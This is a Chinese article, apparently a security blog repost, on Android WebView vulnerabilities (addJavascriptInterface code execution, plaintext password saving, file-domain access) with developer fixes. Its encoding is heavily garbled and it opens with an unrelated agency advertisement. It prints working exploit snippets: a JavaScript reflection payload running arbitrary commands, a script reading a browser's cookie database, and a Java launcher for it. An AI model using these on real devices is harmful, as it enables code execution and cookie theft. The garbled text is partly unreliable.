0X01 About WebView
創(chuàng)新互聯(lián)建站成立于2013年,是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司,擁有項(xiàng)目成都網(wǎng)站制作�、成都網(wǎng)站建設(shè)網(wǎng)站策劃,項(xiàng)目實(shí)施與項(xiàng)目整合能力�����。我們以讓每一個(gè)夢(mèng)想脫穎而出為使命�����,1280元古塔做網(wǎng)站,已為上家服務(wù),為古塔各地企業(yè)和個(gè)人服務(wù),聯(lián)系電話:13518219792
在Android開發(fā)中�,經(jīng)常會(huì)使用WebView來實(shí)現(xiàn)WEB頁面的展示,在Activiry中啟動(dòng)自己的瀏覽器�����,或者簡(jiǎn)單的展示一些在線內(nèi)容等��。WebView功能強(qiáng)大����,應(yīng)用廣泛���,但它是天使與惡魔的合體,一方面它增強(qiáng)了APP的上網(wǎng)體驗(yàn)���,讓APP功能更多樣化�,另一方面它也引入了很多的安全問題�。在過去幾年WebView中被披露的重大漏洞包括了任意代碼執(zhí)行漏洞、跨域����、密碼明文保存等,這些安全問題可以直接導(dǎo)致用戶敏感信息泄露����,移動(dòng)終端被惡意***者控制。下文將詳細(xì)介紹這一系列安全問題���,羅列相關(guān)的一些案列����,并提供相應(yīng)安全開發(fā)建議�����。
0X02 WebView任意代碼執(zhí)行漏洞
已知的WebView任意代碼執(zhí)行漏洞有4個(gè)���。較早被公布是CVE-2012-6636�����,揭露了WebView中addJavascriptInterface接口會(huì)引起遠(yuǎn)程代碼執(zhí)行漏洞�����。接著是CVE-2013-4710���,針對(duì)某些特定機(jī)型會(huì)存在addJavascriptInterface API引起的遠(yuǎn)程代碼執(zhí)行漏洞。之后是CVE-2014-1939爆出WebView中內(nèi)置導(dǎo)出的“searchBoxJavaBridge_”Java Object可能被利用���,實(shí)現(xiàn)遠(yuǎn)程任意代碼�����。再后來是CVE-2014-7224�����,類似于CVE-2014-1939���,WebView內(nèi)置導(dǎo)出“accessibility”和“accessibilityTraversal”兩個(gè)Java Object接口��,可被利用實(shí)現(xiàn)遠(yuǎn)程任意代碼執(zhí)行���。
后文我們將圍繞下面這段常見的示例代碼展開:
WebView mWebView = (WebView)findViewById(R.id.webView);
①WebSettings msetting = mWebView.getSettings();
②msetting.setJavaScriptEnabled(true);
③mWebView.addJavascriptInterface(new TestAddJsInterface(), "myjs");
④mWebView.loadUrl(getIntent().getStringExtra("url"));
CVE-2012-6636
Android系統(tǒng)為了方便APP中Java代碼和網(wǎng)頁中的Javascript腳本交互,在WebView控件中實(shí)現(xiàn)了addJavascriptInterface接口��,對(duì)應(yīng)示例代碼中的③����,網(wǎng)頁中的JS腳本可以利用接口“myjs”調(diào)用App中的Java代碼,而Java對(duì)象繼承關(guān)系會(huì)導(dǎo)致很多Public的函數(shù)及getClass函數(shù)都可以在JS中被訪問��,結(jié)合Java的反射機(jī)制���,***者還可以獲得系統(tǒng)類的函數(shù)����,進(jìn)而可以進(jìn)行任意代碼執(zhí)行���。漏洞在2013年8月被披露后����,很多APP都中招,其中瀏覽器APP成為重災(zāi)區(qū)�。但截至目前任有很多APP中依然存在此漏洞,與以往不同的只是***入口發(fā)生了一定的變化�����。另外我們也發(fā)現(xiàn)一些小廠商的APP開發(fā)團(tuán)隊(duì)因?yàn)槿狈Π踩庾R(shí)���,依然還在APP中隨心所欲的使用addjs接口,明目張膽踩雷��。
出于安全考慮�����,Google在API 17中規(guī)定允許被調(diào)用的函數(shù)必須以@JavascriptInterface進(jìn)行注解�,理論上如果APP依賴的API為17或者以上,就不會(huì)受該問題的影響����。但部分機(jī)型上,API 17依然受影響�����,并且如果APP存在此漏洞,且targetsdk小于17��,那漏洞的影響可以覆蓋到android4.4的終端,如果大于等于17�,只能在android4.2的機(jī)型上觸發(fā),所以前一種情況的危害目前來看依舊很大��。
CVE-2014-1939
在2014年發(fā)現(xiàn)在Android4.4以下的系統(tǒng)中��,webkit中默認(rèn)內(nèi)置了“searchBoxJavaBridge_”�, 代碼位于“java/android/webkit/BrowserFrame.java”,該接口同樣存在遠(yuǎn)程代碼執(zhí)行的威脅��。
CVE-2014-7224
在2014年����,研究人員Daoyuan Wu和Rocky Chang發(fā)現(xiàn),當(dāng)系統(tǒng)輔助功能服務(wù)被開啟時(shí)���,在Android4.4以下的系統(tǒng)中�����,由系統(tǒng)提供的WebView組件都默認(rèn)導(dǎo)出"accessibility" 和"accessibilityTraversal"這兩個(gè)接口��,代碼位于“android/webkit/AccessibilityInjector.java”���,這兩個(gè)接口同樣存在遠(yuǎn)程任意代碼執(zhí)行的威脅�。
常見掛馬頁面
function addJsHack(cmdArgs){
for (var obj in window)
{ try {
if ("getClass" in window[obj]) {
try{
window[obj].getClass().forName("java.lang.Runtime").
getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);;
}catch(e){
}
}
} catch(e) {
}
}
}
addJsHack()
掃碼***
圖片來自于某漏洞收集平臺(tái)�,通過二維碼掃描觸發(fā)WebView任意代碼執(zhí)行漏洞:
以聚美優(yōu)品為例Ver 3.305,APK MD5:DD8B00EDA393526F66D25CA16E8C7B5C���,相關(guān)代碼位于com.jm.android.jumei.controls.JuMeiCustomWebView.java中:
public void initWebView(Activity activity, String str, LinearLayout linearLayout, IWebViewNotify iWebViewNotify) {
......
this.wapView.addJavascriptInterface(new WebAppJSInterface(), WEBVIEW_JS_INTERFACE_NAME);
}
0X03 WebView密碼明文存儲(chǔ)漏洞
WebView默認(rèn)開啟密碼保存功能mWebView.setSavePassword(true),如果該功能未關(guān)閉����,在用戶輸入密碼時(shí),會(huì)彈出提示框�,詢問用戶是否保存密碼,如果選擇"是"��,密碼會(huì)被明文保到/data/data/com.package.name/databases/webview.db
0X04 WebView域控制不嚴(yán)格漏洞
setAllowFileAccess
Android中默認(rèn)mWebView.setAllowFileAccess(true)���,在File域下�,能夠執(zhí)行任意的JavaScript代碼�����,同源策略跨域訪問能夠?qū)λ接心夸浳募M(jìn)行訪問等。APP對(duì)嵌入的WebView未對(duì)file:/// 形式的URL做限制����,會(huì)導(dǎo)致隱私信息泄露,針對(duì)IM類軟件會(huì)導(dǎo)致聊天信息�、聯(lián)系人等等重要信息泄露,針對(duì)瀏覽器類軟件�����,則更多的是cookie信息泄露����。
setAllowFileAccessFromFileURLs
在JELLY_BEAN以前的版本默認(rèn)是setAllowFileAccessFromFileURLs(true),允許通過file域url中的Javascript讀取其他本地文件,在JELLY_BEAN及以后的版本中默認(rèn)已被是禁止�����。
setAllowUniversalAccessFromFileURLs
在JELLY_BEAN以前的版本默認(rèn)是setAllowUniversalAccessFromFileURLs(true),允許通過file域url中的Javascript訪問其他的源��,包括其他的本地文件和http,https源的數(shù)據(jù)���。在JELLY_BEAN及以后的版本中默認(rèn)已被禁止�。
360手機(jī)瀏覽器缺陷可導(dǎo)致用戶敏感數(shù)據(jù)泄漏
以360手機(jī)瀏覽器4.8版本為例,由于未對(duì)file域做安全限制����,惡意APP調(diào)用360瀏覽器加載本地的***頁面(比如惡意APP釋放到SDCARD上的一個(gè)HTML)后,就可以獲取360手機(jī)瀏覽器下的所有私有數(shù)據(jù)��,包括webviewCookiesChromium.db下的cookie內(nèi)容�,***頁面關(guān)鍵代碼:
function getDatabase() {
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}
xmlhttp = request;
var prefix = "file:////data/data/com.qihoo.browser/databases";
var postfix = "/webviewCookiesChromium.db"; //取保存cookie的db
var path = prefix.concat(postfix);
// 獲取本地文件代碼
xmlhttp.open("GET", path, false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;
return ret;
}
漏洞利用代碼:
copyFile(); //自定義函數(shù),釋放filehehe.html到sd卡上
String url = "file:///mnt/sdcard/filehehe.html";
Intent contIntent = new Intent();
contIntent.setAction("android.intent.action.VIEW");
contIntent.setData(Uri.parse(url));
Intent intent = new Intent();
intent.setClassName("com.qihoo.browser","com.qihoo.browser.BrowserActivity");
intent.setAction("android.intent.action.VIEW");
intent.setData(Uri.parse(url));
this.startActivity(intent);
0X05 WebView file跨域漏洞
Android 2.3 webkit或者瀏覽器APP自建內(nèi)核中會(huì)存在此類跨域漏洞���。在處理轉(zhuǎn)跳時(shí)存在漏洞����,導(dǎo)致允許從http域跨向file域�����,實(shí)現(xiàn)跨域漏洞����。以某瀏覽器4.5.0.511版本為例�����,寫一個(gè)html,命名為filereach.html�����,存放在服務(wù)器上���。該瀏覽器4.5.0.511的X5內(nèi)核存在http域跨file域的漏洞����。POC代碼如下所示:
在瀏覽器中打開服務(wù)器上的filereach.html�����,將從http域跳轉(zhuǎn)到file域
0X06安全開發(fā)建議
1)使用騰訊御安全類漏洞掃描工具進(jìn)行基礎(chǔ)開發(fā)漏洞檢測(cè)定位�����;
2)建議開發(fā)者通過以下方式移除該JavaScript接口:
removeJavascriptInterface("searchBoxJavaBridge_")
removeJavascriptInterface("accessibility")���;
removeJavascriptInterface("accessibilityTraversal")
3)出于安全考慮��,為了防止Java層的函數(shù)被隨便調(diào)用�����,Google在4.2版本之后,規(guī)定允許被調(diào)用的函數(shù)必須以@JavascriptInterface進(jìn)行注解
4)通過WebSettings.setSavePassword(false)關(guān)閉密碼保存提醒功能
5)通過以下設(shè)置����,防止越權(quán)訪問,跨域等安全問題:
setAllowFileAccess(false)
setAllowFileAccessFromFileURLs(false)
setAllowUniversalAccessFromFileURLs(false)
0X07參考信息
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7224
http://drops.wooyun.org/webview.html
更多:騰訊御安全技術(shù)博客
名稱欄目:Android安全開發(fā)之WebView中的地雷
地址分享:
http://weahome.cn/article/ipcopi.html
重慶分公司
重慶分公司
